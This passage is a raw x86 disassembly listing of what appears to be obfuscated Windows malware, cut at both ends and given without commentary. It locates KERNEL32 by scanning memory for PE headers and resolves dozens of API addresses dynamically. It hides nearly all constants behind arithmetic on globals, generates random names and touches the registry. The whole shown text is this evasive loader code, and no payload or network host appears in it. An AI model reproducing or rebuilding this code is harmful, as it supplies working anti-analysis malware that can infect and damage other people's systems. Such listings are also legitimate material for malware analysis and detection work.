cmp dword ptr ds:1000F0E0h[esi], 0
jz short loc_423FB1
movzx edx, word ptr ds:10010A10h[edi*2]
mov ecx, ds:10014154h
add ecx, 0FFF8h
add ecx, ds:100141B4h
cmp edx, ecx
jz short loc_423FB1
mov edx, [ebp+var_1005C]
cmp ds:1000E010h[esi], edx
jnz short loc_423FB1
mov dl, ds:100101B0h[edi]
cmp dl, [ebp+var_10055]
jnz short loc_423FB1
lea edi, ds:10010A10h[edi*2]
inc word ptr [edi]
jmp short loc_423FE2
; ---------------------------------------------------------------------------
loc_423FB1: ; CODE XREF: sub_4239D8+58F�j
; sub_4239D8+5AD�j ...
inc [ebp+var_10088]
loc_423FB7: ; CODE XREF: sub_4239D8+57A�j
mov eax, ds:100140ECh
add eax, 3E2h
cmp [ebp+var_10088], eax
jb short loc_423F54
jmp short loc_423FE2
; ---------------------------------------------------------------------------
loc_423FCB: ; CODE XREF: sub_4239D8+54C�j
mov edi, [ebp+var_10054]
mov esi, ds:10014178h
sub esi, 4
mov ds:10010A10h[edi*2], si
loc_423FE2: ; CODE XREF: sub_4239D8+5D7�j
; sub_4239D8+5F1�j
call dword ptr ds:10013950h
mov edi, [ebp+var_10054]
mov ds:10012830h[edi*4], eax
lea esi, ds:10014320h
mov ds:1000F0E0h[edi*4], esi
mov edi, [ebp+var_10054]
lea edi, ds:1000F0E0h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10054]
lea edi, ds:1000F0E0h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10054]
lea eax, [ebp+var_10078]
push eax
call dword ptr ds:10013D94h
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_42407B: ; CODE XREF: sub_4239D8+140�j
; sub_4239D8+14D�j ...
cmp [ebp+var_10044], 0
jz short loc_424090
mov eax, [ebp+var_10044]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_424090: ; CODE XREF: sub_4239D8+6AA�j
cmp [ebp+var_4], 0
jz short loc_42409F
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_42409F: ; CODE XREF: sub_4239D8+10E�j
; sub_4239D8+6BC�j
inc [ebp+var_1C]
loc_4240A2: ; CODE XREF: sub_4239D8+C6�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_423AA3
loc_4240AE: ; CODE XREF: sub_4239D8+AF�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4240B7: ; CODE XREF: sub_4239D8+8E�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_4240C2: ; CODE XREF: sub_4239D8+5F�j
; sub_4239D8+1EB�j
pop edi
pop esi
pop ebx
leave
retn
sub_4239D8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 100105B8h
call dword ptr ds:100109F4h
mov eax, ds:100105B8h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4240DE proc near ; CODE XREF: sub_41E931+FD�p
; sub_41EF87+404�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, ds:100140A4h
sub esi, 9
jmp short loc_424124
; ---------------------------------------------------------------------------
loc_4240F2: ; CODE XREF: sub_4240DE+49�j
call dword ptr ds:10013D90h
mov edi, ds:100140B0h
add edi, 56h
add edi, ds:10014094h
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_424124: ; CODE XREF: sub_4240DE+12�j
cmp esi, [ebp+arg_4]
jl short loc_4240F2
mov eax, [ebp+arg_4]
movsx edx, word ptr ds:10014114h
add edx, ds:10014188h
sub edx, 12h
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4240DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424146 proc near ; CODE XREF: sub_41E931+1F3�p
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
push 0
push 0
push 3
push 0
push 0
push 80000000h
push 10011220h
call dword ptr ds:10013968h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_424187
movsx eax, word ptr ds:10014120h
sub eax, 9
mov edx, ds:100141E0h
dec edx
mov [esi+eax], dl
jmp short loc_4241DD
; ---------------------------------------------------------------------------
loc_424187: ; CODE XREF: sub_424146+29�j
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10013D80h
push 0
lea eax, [ebp+var_4]
push eax
mov eax, ds:10014188h
add eax, 0Bh
add eax, ds:100141A0h
push eax
push esi
push edi
call dword ptr ds:1000D02Ch
mov ebx, eax
push edi
call dword ptr ds:1001282Ch
cmp ebx, ds:100140D4h
jnz short loc_4241DD
mov eax, ds:10014108h
add eax, ds:10014134h
sub eax, 0Dh
mov edx, ds:100140D8h
sub edx, 5
mov [esi+eax], dl
loc_4241DD: ; CODE XREF: sub_424146+3F�j
; sub_424146+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_424146 endp
; =============== S U B R O U T I N E =======================================
sub_4241E2 proc near ; CODE XREF: .data:00424DD3�p
push edi
push 10014BCFh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013840h, eax
push 10014BC7h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000EFBCh, eax
push 10014BB3h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10010598h, eax
push 10014BA3h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10011208h, eax
push 10014B94h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013968h, eax
push 10014B85h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000D008h, eax
push 10014B73h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013D80h, eax
push 10014B66h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013D6Ch, eax
push 10014B57h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1001282Ch, eax
push 10014B48h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100137F8h, eax
push 10014B3Ch
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000D000h, eax
push 10014B31h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10010094h, eax
push 10014B1Ah
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000D00Ch, eax
push 10014B03h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1001381Ch, eax
push 10014AEDh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100137D8h, eax
push 10014ADDh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000D03Ch, eax
push 10014AD1h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000D02Ch, eax
push 10014AC1h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1001120Ch, eax
push 10014AB2h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10012804h, eax
push 10014AA4h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100109ECh, eax
push 10014A97h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100105CCh, eax
push 10014A86h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10011420h, eax
push 10014A75h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000D030h, eax
push 10014A65h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013950h, eax
push 10014A53h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1001121Ch, eax
push 10014A42h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000EFB4h, eax
push 10014A35h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100105BCh, eax
push 10014A24h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013844h, eax
push 10014A0Fh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1001382Ch, eax
push 100149FFh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000EFB0h, eax
push 100149EAh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10010088h, eax
push 100149DDh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10011534h, eax
push 100149CDh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100137ECh, eax
push 100149BFh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1001281Ch, eax
push 100149A9h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1001280Ch, eax
push 10014992h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100105B0h, eax
push 1001497Ah
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100109F4h, eax
push 10014962h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000D010h, eax
push 10014949h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100137E4h, eax
push 10014936h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013960h, eax
push 1001491Eh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013958h, eax
push 1001490Dh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013D78h, eax
push 100148FBh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100105A8h, eax
push 100148ECh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013D7Ch, eax
push 100148D5h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:100109F8h, eax
push 100148BFh
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10011204h, eax
push 100148A4h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10012828h, eax
push 1001488Ah
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013800h, eax
push 10014876h
call sub_41B08F
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:1000D038h, eax
push 1001485Fh
call sub_41B08F
add esp, 0C8h
push eax
push dword ptr ds:10014254h
call dword ptr ds:100101ACh
mov ds:10013808h, eax
pop edi
retn
sub_4241E2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424763 proc near ; CODE XREF: sub_423599+BA�p
; sub_423599+F1�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_4247A4
cmp al, 79h
jz short loc_4247A4
cmp al, 75h
jz short loc_4247A4
cmp al, 69h
jz short loc_4247A4
cmp al, 6Fh
jz short loc_4247A4
cmp al, 61h
jnz short loc_4247A8
loc_4247A4: ; CODE XREF: sub_424763+2B�j
; sub_424763+2F�j ...
add [ebp+arg_0], 1
loc_4247A8: ; CODE XREF: sub_424763+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_4247B2
add [ebp+arg_0], 1
loc_4247B2: ; CODE XREF: sub_424763+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_424763 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10013964h
call dword ptr ds:100109F4h
mov eax, ds:10013964h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4247D1 proc near ; CODE XREF: .data:00422517�p
var_7 = byte ptr -7
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
mov esi, [ebp+arg_8]
mov eax, ebx
add eax, 2
mov ecx, 3
mov edx, 0AAAAAAABh
mul edx
shr edx, 1
mov [ebp+var_4], edx
mov edi, edx
shl edi, 2
mov edx, [ebp+arg_C]
dec edx
cmp edi, edx
jbe short loc_42484C
xor eax, eax
jmp loc_4248FE
; ---------------------------------------------------------------------------
loc_424809: ; CODE XREF: sub_4247D1+83�j
push esi
push [ebp+arg_0]
call sub_41E6DC
add esp, 8
mov eax, ds:10014170h
movsx edx, word ptr ds:10014220h
add eax, edx
sub eax, 9
sub ebx, eax
movsx eax, word ptr ds:1001411Ch
dec eax
add eax, [ebp+arg_0]
mov [ebp+arg_0], eax
movsx eax, word ptr ds:10014194h
movsx edx, word ptr ds:1001423Ch
add eax, edx
sub eax, 0Ah
lea esi, [esi+eax]
loc_42484C: ; CODE XREF: sub_4247D1+2F�j
mov eax, ds:10014104h
dec eax
cmp ebx, eax
jnb short loc_424809
movsx eax, word ptr ds:10014130h
add eax, ds:100141E8h
sub eax, 9
cmp ebx, eax
jbe short loc_4248E4
push 3
mov eax, ds:100140B0h
add eax, ds:1001409Ch
sub eax, 0Ah
push eax
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10012818h
push ebx
push [ebp+arg_0]
lea eax, [ebp+var_7]
push eax
call dword ptr ds:10012808h
push esi
lea eax, [ebp+var_7]
push eax
call sub_41E6DC
add esp, 20h
mov eax, ds:1001415Ch
add eax, ds:10014158h
sub eax, 5
mov byte ptr [esi+eax], 3Dh
mov eax, ds:100141C8h
movsx edx, word ptr ds:10014110h
add eax, edx
dec eax
cmp ebx, eax
jnz short loc_4248D1
mov eax, ds:1001424Ch
sub eax, 7
mov byte ptr [esi+eax], 3Dh
loc_4248D1: ; CODE XREF: sub_4247D1+F2�j
movsx eax, word ptr ds:100140B8h
add eax, ds:10014188h
sub eax, 0Eh
lea esi, [esi+eax]
loc_4248E4: ; CODE XREF: sub_4247D1+97�j
movsx eax, word ptr ds:100141F0h
sub eax, 2
movsx edx, word ptr ds:100141DCh
sub edx, 9
mov [esi+eax], dl
xor eax, eax
inc eax
loc_4248FE: ; CODE XREF: sub_4247D1+33�j
pop edi
pop esi
pop ebx
leave
retn
sub_4247D1 endp
; ---------------------------------------------------------------------------
mov eax, 80004001h
retn 10h
; ---------------------------------------------------------------------------
mov eax, 80004001h
retn 8
; ---------------------------------------------------------------------------
mov eax, 80004001h
retn 18h
; =============== S U B R O U T I N E =======================================
sub_42491B proc near ; CODE XREF: sub_4210C1+256�p
arg_0 = dword ptr 4
push esi
push edi
mov esi, [esp+8+arg_0]
mov edi, esi
movsx eax, word ptr ds:10014120h
movsx edx, word ptr ds:1001412Ch
add eax, edx
sub eax, 0Ah
cmp edi, eax
jge short loc_424965
movsx eax, word ptr ds:100140F8h
add eax, 4
imul edi, eax
mov eax, ds:1001410Ch
inc eax
mov edx, esi
add edx, eax
movsx eax, word ptr ds:100141F0h
add eax, 2
imul edx, eax
sub edi, edx
jmp loc_424AB6
; ---------------------------------------------------------------------------
loc_424965: ; CODE XREF: sub_42491B+1D�j
dec edi
mov eax, ds:100141BCh
add eax, 9
add eax, ds:1001414Ch
cmp edi, eax
jge short loc_4249A8
mov eax, ds:10014248h
add eax, ds:100140ECh
sub eax, 4
imul edi, eax
mov eax, edi
sub eax, esi
movsx edx, word ptr ds:10014190h
movsx ecx, word ptr ds:100140F4h
lea edx, [edx+ecx+1]
mov edi, eax
sub edi, edx
jmp loc_424AB6
; ---------------------------------------------------------------------------
loc_4249A8: ; CODE XREF: sub_42491B+5B�j
dec edi
mov eax, ds:1001410Ch
add eax, 22h
cmp edi, eax
jge short loc_4249D9
movsx eax, word ptr ds:1001412Ch
add eax, ds:1001424Ch
sub eax, 0Eh
imul edi, eax
movsx eax, word ptr ds:10014114h
add eax, 39h
sub edi, eax
jmp loc_424AB6
; ---------------------------------------------------------------------------
loc_4249D9: ; CODE XREF: sub_42491B+98�j
dec edi
movsx eax, word ptr ds:10014228h
add eax, 20h
cmp edi, eax
jge short loc_424A14
mov eax, ds:100141D8h
movsx edx, word ptr ds:1001423Ch
add eax, edx
sub eax, 6
imul edi, eax
mov eax, ds:100140BCh
add eax, 3Fh
movsx edx, word ptr ds:10014190h
add eax, edx
sub edi, eax
jmp loc_424AB6
; ---------------------------------------------------------------------------
loc_424A14: ; CODE XREF: sub_42491B+CB�j
dec edi
mov eax, ds:10014094h
add eax, 2Ah
add eax, ds:100140F0h
cmp edi, eax
jge short loc_424A4C
movsx eax, word ptr ds:10014130h
add eax, ds:10014134h
sub eax, 4
imul edi, eax
mov eax, ds:1001413Ch
add eax, 4Bh
add eax, ds:100141A4h
sub edi, eax
jmp short loc_424AB6
; ---------------------------------------------------------------------------
loc_424A4C: ; CODE XREF: sub_42491B+10A�j
dec edi
movsx eax, word ptr ds:10014120h
add eax, 2Dh
cmp edi, eax
jge short loc_424A7A
movsx eax, word ptr ds:100140B8h
sub eax, 7
imul edi, eax
mov eax, ds:10014150h
add eax, 63h
add eax, ds:100141D0h
sub edi, eax
jmp short loc_424AB6
; ---------------------------------------------------------------------------
loc_424A7A: ; CODE XREF: sub_42491B+13E�j
dec edi
mov eax, ds:10014134h
add eax, 35h
cmp edi, eax
jge short loc_424AA3
movsx eax, word ptr ds:100140E4h
imul edi, eax
mov eax, ds:1001414Ch
add eax, 64h
add eax, ds:1001422Ch
sub edi, eax
jmp short loc_424AB6
; ---------------------------------------------------------------------------
loc_424AA3: ; CODE XREF: sub_42491B+16A�j
movsx eax, word ptr ds:10014114h
mov edx, ds:100141C4h
lea eax, [eax+edx+2Fh]
sub edi, eax
loc_424AB6: ; CODE XREF: sub_42491B+45�j
; sub_42491B+88�j ...
mov eax, edi
pop edi
pop esi
retn
sub_42491B endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_424ABE: ; CODE XREF: .data:00424AEB�j
call sub_41AF48
mov eax, ds:10014140h
sub eax, 7
mov edx, ds:100141E0h
add edx, 0EA5Bh
movsx ecx, word ptr ds:100140E8h
add edx, ecx
imul eax, edx
push eax
call dword ptr ds:1001380Ch
pop ecx
jmp short loc_424ABE
; ---------------------------------------------------------------------------
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov eax, [ebp+0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword ptr ds:100105C8h
pop edi
pop ebp
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424B0F proc near ; CODE XREF: sub_41F6A1+19F�p
; sub_41F6A1+20E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push edi
lea eax, [ebp+var_4]
push eax
push 20019h
mov eax, ds:100140E0h
sub eax, 2
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call dword ptr ds:1001059Ch
mov edi, eax
or edi, edi
jz short loc_424B3C
xor eax, eax
jmp short loc_424B69
; ---------------------------------------------------------------------------
loc_424B3C: ; CODE XREF: sub_424B0F+27�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_14]
push 0
push [ebp+arg_8]
push [ebp+var_4]
call dword ptr ds:1000D044h
mov edi, eax
push [ebp+var_4]
call dword ptr ds:100137E8h
or edi, edi
jz short loc_424B66
xor eax, eax
jmp short loc_424B69
; ---------------------------------------------------------------------------
loc_424B66: ; CODE XREF: sub_424B0F+51�j
xor eax, eax
inc eax
loc_424B69: ; CODE XREF: sub_424B0F+2B�j
; sub_424B0F+55�j
pop edi
leave
retn
sub_424B0F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
push edi
lea eax, ds:1000139Fh
mov [ebp-10h], eax
mov edx, eax
mov ecx, ds:10014170h
add ecx, 0Bh
mov eax, edx
shr eax, cl
mov edx, ds:100141E0h
add edx, 0Ah
add edx, ds:100141D4h
mov ecx, edx
mov ebx, eax
shl ebx, cl
loc_424BA5: ; CODE XREF: .data:00424BBF�j
; .data:00424BF0�j ...
mov [ebp-18h], ebx
mov eax, ebx
cmp word ptr [eax], 5A4Dh
jz short loc_424BC1
movsx eax, word ptr ds:10014148h
add eax, 10000h
sub ebx, eax
jmp short loc_424BA5
; ---------------------------------------------------------------------------
loc_424BC1: ; CODE XREF: .data:00424BAF�j
mov eax, ds:10014198h
add eax, 33h
movsx edx, word ptr ds:10014110h
add eax, edx
mov esi, ebx
add esi, eax
mov eax, ebx
add eax, [esi]
mov [ebp-14h], eax
mov ecx, [ebp-10h]
cmp eax, ecx
jbe short loc_424BF2
mov eax, ds:1001409Ch
add eax, 0FFFFh
sub ebx, eax
jmp short loc_424BA5
; ---------------------------------------------------------------------------
loc_424BF2: ; CODE XREF: .data:00424BE2�j
mov eax, [ebp-14h]
mov [ebp-8], eax
movzx eax, word ptr [eax]
cmp eax, 4550h
jz short loc_424C16
mov eax, ds:100140C8h
add eax, 0FFFCh
add eax, ds:100141C8h
sub ebx, eax
jmp short loc_424BA5
; ---------------------------------------------------------------------------
loc_424C16: ; CODE XREF: .data:00424C00�j
mov eax, [ebp-8]
mov eax, [eax+80h]
mov [ebp-0Ch], eax
mov eax, ds:10014198h
add eax, ds:100140DCh
sub eax, 9
mov [ebp-4], eax
jmp loc_424DB8
; ---------------------------------------------------------------------------
loc_424C38: ; CODE XREF: .data:00424DC4�j
mov eax, ebx
add eax, [ebp-0Ch]
add eax, [ebp-4]
mov [ebp-12Ch], eax
mov edx, ds:100141E0h
add edx, ds:10014184h
sub edx, 2
cmp [eax], edx
jz loc_424DCA
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+0Ch]
mov [ebp-130h], edx
push edx
lea eax, [ebp-127h]
push eax
call sub_425D7D
mov eax, ds:10014184h
add eax, ds:100141CCh
sub eax, 2
mov [ebp-28h], eax
jmp short loc_424CB0
; ---------------------------------------------------------------------------
loc_424C8E: ; CODE XREF: .data:00424CD0�j
mov eax, [ebp-28h]
mov al, [ebp+eax-127h]
cmp al, 61h
jle short loc_424CAD
cmp al, 7Ah
jge short loc_424CAD
mov eax, [ebp-28h]
lea eax, [ebp+eax-127h]
sub byte ptr [eax], 20h
loc_424CAD: ; CODE XREF: .data:00424C9A�j
; .data:00424C9E�j
inc dword ptr [ebp-28h]
loc_424CB0: ; CODE XREF: .data:00424C8C�j
mov eax, [ebp-28h]
movsx eax, byte ptr [ebp+eax-127h]
movsx edx, word ptr ds:10014130h
movsx ecx, word ptr ds:10014228h
add edx, ecx
sub edx, 6
cmp eax, edx
jnz short loc_424C8E
mov eax, ds:100140BCh
add eax, ds:100140CCh
cmp byte ptr [ebp+eax-12Fh], 4Bh
jnz loc_424DB4
mov eax, ds:10014234h
cmp byte ptr [ebp+eax-129h], 45h
jnz loc_424DB4
mov eax, ds:100141FCh
add eax, ds:100140ACh
cmp byte ptr [ebp+eax-12Eh], 52h
jnz loc_424DB4
mov eax, ds:1001416Ch
cmp byte ptr [ebp+eax-124h], 4Ch
jnz loc_424DB4
mov eax, ds:100141E4h
add eax, ds:100141ECh
cmp byte ptr [ebp+eax-128h], 33h
jnz short loc_424DB4
mov eax, ds:100140B0h
add eax, ds:100141ACh
cmp byte ptr [ebp+eax-12Eh], 32h
jnz short loc_424DB4
mov eax, [ebp-12Ch]
mov edx, ebx
add edx, [eax+10h]
mov [ebp-138h], edx
mov eax, ds:100140D4h
mov [ebp-134h], eax
loc_424D70: ; CODE XREF: .data:00424DB0�j
mov eax, [ebp-138h]
mov esi, eax
add esi, [ebp-134h]
mov edi, [esi]
mov eax, ds:1001424Ch
add eax, ds:100140E0h
sub eax, 0Bh
cmp edi, eax
jz short loc_424DCA
push edi
call sub_422607
pop ecx
cmp dword ptr ds:10014254h, 0
jnz short loc_424DCA
movsx eax, word ptr ds:100141B8h
dec eax
add [ebp-134h], eax
jmp short loc_424D70
; ---------------------------------------------------------------------------
jmp short loc_424DCA
; ---------------------------------------------------------------------------
loc_424DB4: ; CODE XREF: .data:00424CE5�j
; .data:00424CF8�j ...
add dword ptr [ebp-4], 14h
loc_424DB8: ; CODE XREF: .data:00424C33�j
mov eax, [ebp-8]
mov eax, [eax+84h]
cmp [ebp-4], eax
jb loc_424C38
loc_424DCA: ; CODE XREF: .data:00424C57�j
; .data:00424D90�j ...
cmp dword ptr ds:10014254h, 0
jz short loc_424E27
call sub_4241E2
call sub_422EEA
call sub_4234DB
mov edx, eax
mov [ebp-19h], dl
movzx eax, byte ptr [ebp-19h]
mov edx, ds:1001413Ch
sub edx, 6
cmp eax, edx
jz short loc_424E27
lea eax, [ebp-24h]
push eax
movsx eax, word ptr ds:10014190h
sub eax, 5
push eax
lea eax, [ebp-20h]
push eax
push 1000139Fh
mov eax, ds:100140DCh
add eax, ds:10014108h
sub eax, 9
push eax
push 0
call dword ptr ds:10013D70h
loc_424E27: ; CODE XREF: .data:00424DD1�j
; .data:00424DF6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
mov eax, 80004001h
retn 18h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424E34 proc near ; CODE XREF: .data:0041B31F�p
; sub_41BD54+179�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
movsx esi, word ptr ds:10014110h
lea eax, [ebp+var_4]
push eax
push 10015C24h
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, ds:1001416Ch
sub eax, 2
cmp edi, eax
jz short loc_424E6B
xor eax, eax
jmp short loc_424ED6
; ---------------------------------------------------------------------------
loc_424E6B: ; CODE XREF: sub_424E34+31�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
mov eax, ds:10014124h
add eax, ds:10014134h
sub eax, 6
cmp edi, eax
jnz short loc_424ECB
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
mov eax, ds:100141CCh
add eax, ds:10014238h
sub eax, 0Ah
cmp edi, eax
jnz short loc_424EC2
mov eax, ds:10014154h
mov esi, eax
add esi, ds:10014234h
sub esi, 5
loc_424EC2: ; CODE XREF: sub_424E34+7C�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_424ECB: ; CODE XREF: sub_424E34+59�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_424ED6: ; CODE XREF: sub_424E34+35�j
pop edi
pop esi
pop ebx
leave
retn
sub_424E34 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_424EDB proc near ; CODE XREF: sub_41D579+18F�p
var_12110 = byte ptr -12110h
var_1210C = word ptr -1210Ch
var_1210A = word ptr -1210Ah
var_12108 = dword ptr -12108h
var_12104 = byte ptr -12104h
var_12000 = word ptr -12000h
var_11FFE = byte ptr -11FFEh
var_1FFF = byte ptr -1FFFh
var_1FB3 = byte ptr -1FB3h
var_1FB2 = byte ptr -1FB2h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 12110h
call sub_425D5D
push ebx
push esi
push edi
push [ebp+arg_0]
lea eax, [ebp+var_12104]
push eax
